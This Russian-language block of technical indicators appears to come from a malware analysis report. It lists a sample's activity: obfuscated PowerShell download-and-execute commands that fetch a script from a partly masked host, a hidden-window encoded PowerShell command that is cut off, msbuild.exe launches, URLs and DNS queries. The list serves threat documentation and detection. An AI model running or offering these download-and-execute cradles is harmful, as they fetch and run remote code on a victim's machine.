Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('http://sk#######malwrhunterteams.com/scanme.txt')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- http://sk#######malwrhunterteams.com/scanme.txt
- http://pa##e.ee/r/zv8f8
- DNS ASK sk#######malwrhunterteams.com
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('http://sk#######malwrhunterteams.com/scanme.txt')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABxAHAAVABhAEIATwBtAG4AbwBUAFQATQB5AG0AIAA9ACAAJwBqAFIAZgB4AGoAUABPAHYAUwBKAHkASQBuAEgAZABYACcAOwANAAoAJABsAHcAQgBIAGMAYgBNAG4ASwBaAEwAVwBXAFEAbgAgAD0AIAAnAGQAR...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'